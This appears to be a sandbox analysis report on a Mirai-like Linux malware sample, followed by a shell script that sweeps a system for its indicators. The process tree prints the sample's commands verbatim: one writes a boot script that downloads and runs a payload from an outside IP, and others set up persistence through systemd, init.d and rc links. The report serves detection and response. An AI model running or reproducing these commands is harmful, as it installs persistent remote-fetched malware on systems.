Analysis

  • max time kernel
    58s
  • max time network
    133s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
  • submitted
    21/11/2024, 08:51

General

  • Target

    f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067.elf

  • Size

    134KB

  • MD5

    2fcff406e1f57e00d98b987d23cd398f

  • SHA1

    7675a391d83a38868d5f9194a9c7248291e1705a

  • SHA256

    f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067

  • SHA512

    6003c40f6af2626ab5fcf6fc381e4e27abb624111d8e297d24b2110d78134ade98cc702e0fe3c556b65900b9a03efbde16e53395280bdbf395b9d936c19227de

  • SSDEEP

    1536:tLXuqtWr4N9zWJPEceN7U9empeIwOdzZXz8EmbycedlGcYx3dZ3aHXzy+LwCvnqX:puqtWr4DItmecedlotFU3vnqln

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Creates/modifies environment variables 1 TTPs 1 IoCs

    Creating/modifying environment variables is a common persistence mechanism.

  • Modifies init.d 2 TTPs 2 IoCs

    Adds/modifies system service, likely for persistence.

  • Modifies rc script 2 TTPs 1 IoCs

    Adding/modifying system rc scripts is a common persistence mechanism.

  • Modifies systemd 2 TTPs 1 IoCs

    Adds/modifies systemd service files. Likely to achieve persistence.

  • Modifies Bash startup script 2 TTPs 1 IoCs
  • Changes its process name 1 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 7 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067.elf
    /tmp/f34e59d9711b93c8c0192f717063b7db0d20cb342490a0c9fc9d9d63d245d067.elf
    1⤵
    • Modifies Watchdog functionality
    • Creates/modifies environment variables
    • Modifies init.d
    • Modifies rc script
    • Modifies systemd
    • Modifies Bash startup script
    • Changes its process name
    • Reads runtime system information
    PID:703
    • /bin/sh
      sh -c "systemctl enable custom.service >/dev/null 2>&1"
      2⤵
        PID:706
        • /bin/systemctl
          systemctl enable custom.service
          3⤵
          • Enumerates kernel/hardware configuration
          • Reads runtime system information
          PID:715
      • /bin/sh
        sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
        2⤵
          PID:740
        • /bin/sh
          sh -c "echo \"#!/bin/sh # /etc/init.d/sh case \\\"\$1\\\" in start) echo 'Starting sh' /bin/sh & wget http://87.120.84.247/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/sh"
          2⤵
          • File and Directory Permissions Modification
          • Modifies init.d
          PID:741
        • /bin/sh
          sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
          2⤵
          • File and Directory Permissions Modification
          PID:743
          • /bin/chmod
            chmod +x /etc/init.d/sh
            3⤵
            • File and Directory Permissions Modification
            PID:747
        • /bin/sh
          sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
          2⤵
            PID:758
            • /bin/mkdir
              mkdir -p /etc/rc.d
              3⤵
              • Reads runtime system information
              PID:760

        Network

        MITRE ATT&CK Enterprise v15

        Downloads

        • /boot/bootcmd

          Filesize

          110B

          MD5

          2a3758c7be4b51e45514ca71272a2241

          SHA1

          16f6c47091d87086ae361ee9653af0bbb3f0afb7

          SHA256

          05e88586f84b6ddddd894580aa50f2b066be6520174c497e5957860e07f51ea7

          SHA512

          246177d06d5c8d2444663c4d4828f3be8ca640123b6f0934add6953aa9b54e12e7114912644503fd598aa57dedd5a4392e14e136ce2c628899ed1f607a2b77ee

        • /etc/init.d/mybinary

          Filesize

          97B

          MD5

          0680c195fdd2fca0a0e632cf637d150e

          SHA1

          7ded21dcbe33cfde13db634f159b7748b28b61c1

          SHA256

          1d1be04cff45dde0d7a8a6e60e5c6e65312108a926d235892a04b0b2ce6cf38d

          SHA512

          fad47bb194885f9e6b7875e99f4469807eb1aaac0fa7d04b647420bce466a1eb422320eafa59e180bdbd4c69414f671138fb60bdd87403a414f0624d678e497f

        • /etc/init.d/sh

          Filesize

          354B

          MD5

          064ba5f4b09e62ca552b70a2e94d6393

          SHA1

          7076e742aa5e9757e555091c4a72206018115518

          SHA256

          038696b3a44f62a700ee8e6187eef48c8e817068900363d4e527b14899fc22a1

          SHA512

          5488263037dd93ae9daa23e987a2c4016ad4f241d3d318abfbba4d19bf67fa7e1084bf09f03ab07580df49a3b8ac45767e6cbc03cf7e71afff5adb942ef42eb9

        • /etc/inittab

          Filesize

          102B

          MD5

          e5e2c6d263b0ee1c9c19d46192ad5cdf

          SHA1

          3197ca0f3394eedd2c4702cb6eaf7a22817d5fef

          SHA256

          436aed8a5a70ab60873b71384b840ddcb839185208bd3bddb2b6a627e053a548

          SHA512

          bd5e7113e820c1771eeedac572c16201bcc490b820d5d18323f03dfa7e263e14f1bacbf5923a24daac0db1f9789ace29682307464e098f72820655537b6c2786

        • /etc/systemd/system/custom.service

          Filesize

          291B

          MD5

          a31178fddb5564754ff49f0865dd2b20

          SHA1

          f0b205696a09245229469d0ac1809135be57a837

          SHA256

          d6f5a8734ff982cb1d46c25cad29fe1d09421ec31d364c507766a41cb775878d

          SHA512

          7e2e400c9b70d54c7f4c196e8cf7970d4510577ab2777ab7694cb254445a68128256d10750e156681fdab7f35469f0efd9632ddc5432fb078ebf6f57da382a9d
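The process tree and the Downloads list above together give a compact set of host indicators: the five dropped files and their SHA-256 sums, the `S99mybinary` symlink into `/etc/rcS.d`, and the stage-2 download (`http://87.120.84.247/` written to `/tmp/lol.sh`) embedded in the `/etc/init.d/sh` script that PID 741 wrote. The following POSIX `sh` function is an added example, not part of the sandbox report or of the sample, that sweeps a root filesystem (the live `/` or a mounted firmware/disk image) for those artifacts. Paths, hashes, the download host and the stage-2 path are copied from the report; the function names, the `FINDING` output format and the extra URL extraction (which generalises the report's single URL to any `http(s)://` string in a boot-time script) are this example's own.

```shell
#!/bin/sh
# Added example (not from the sandbox report or the sample): offline sweep for
# the persistence artifacts recorded in this analysis. Point it at "/" on a
# suspect host or at the mount point of an extracted image.
# Paths, hashes, C2 host and stage-2 path come from the report; the function
# names and the "FINDING" output format are this example's own.

# Files the sample wrote (Downloads section) with their reported SHA-256.
IOC_FILES="\
/boot/bootcmd 05e88586f84b6ddddd894580aa50f2b066be6520174c497e5957860e07f51ea7
/etc/init.d/mybinary 1d1be04cff45dde0d7a8a6e60e5c6e65312108a926d235892a04b0b2ce6cf38d
/etc/init.d/sh 038696b3a44f62a700ee8e6187eef48c8e817068900363d4e527b14899fc22a1
/etc/inittab 436aed8a5a70ab60873b71384b840ddcb839185208bd3bddb2b6a627e053a548
/etc/systemd/system/custom.service d6f5a8734ff982cb1d46c25cad29fe1d09421ec31d364c507766a41cb775878d"

# Strings from the init script dropped by PID 741 (download host, stage-2 path).
IOC_STRINGS="87.120.84.247 /tmp/lol.sh"

sha256_of() {
    # Print the SHA-256 of $1; print nothing if no hashing tool is available.
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    elif command -v shasum >/dev/null 2>&1; then
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

sweep_persistence_iocs() {
    root="${1:-/}"; root="${root%/}"   # "" means the live root filesystem

    # 1. Dropped files. A hash match is conclusive. /etc/inittab and
    #    /boot/bootcmd exist on clean systems, so only the three names a
    #    stock Debian never has are reported on presence alone.
    printf '%s\n' "$IOC_FILES" | while read -r path want; do
        f="$root$path"
        [ -f "$f" ] || continue
        have=$(sha256_of "$f")
        if [ -n "$have" ] && [ "$have" = "$want" ]; then
            printf 'FINDING hash-match %s %s\n' "$path" "$have"
        else
            case "$path" in
                /etc/init.d/sh|/etc/init.d/mybinary|/etc/systemd/system/custom.service)
                    printf 'FINDING unexpected-file %s %s\n' "$path" "${have:-unhashed}" ;;
            esac
        fi
    done

    # 2. The rcS.d symlink created by PID 740 (reported even if dangling).
    link="$root/etc/rcS.d/S99mybinary"
    if [ -L "$link" ] || [ -e "$link" ]; then
        printf 'FINDING rc-symlink /etc/rcS.d/S99mybinary -> %s\n' \
            "$(readlink "$link" 2>/dev/null || echo '?')"
    fi

    # 3. Downloader indicators in any boot-time script, plus every URL found
    #    there, so a re-pointed stage-2 host is still surfaced.
    for f in "$root"/etc/init.d/* "$root"/etc/systemd/system/*.service \
             "$root"/etc/inittab "$root"/boot/bootcmd; do
        [ -f "$f" ] || continue
        rel="${f#"$root"}"
        for s in $IOC_STRINGS; do
            if grep -qF -- "$s" "$f" 2>/dev/null; then
                printf 'FINDING string %s in %s\n' "$s" "$rel"
            fi
        done
        grep -oE 'https?://[^[:space:]]+' "$f" 2>/dev/null |
            while read -r url; do printf 'FINDING url %s in %s\n' "$url" "$rel"; done
    done
    return 0
}

count_persistence_iocs() {
    # Number of FINDING lines for a root; always exits 0 so it is safe under set -e.
    sweep_persistence_iocs "$1" | awk '/^FINDING/ { n++ } END { print n + 0 }'
}

# Usage on a mounted image:  sweep_persistence_iocs /mnt/suspect
```

A hash match on any of the five files ties the host to this exact sample; the presence-only and string findings are weaker but survive trivial re-packing, and the URL extraction catches a rebuilt init script that points at a different download host. On a live system, also check whether `custom.service` is enabled (`systemctl is-enabled custom.service`), since the sample ran `systemctl enable` as PID 715.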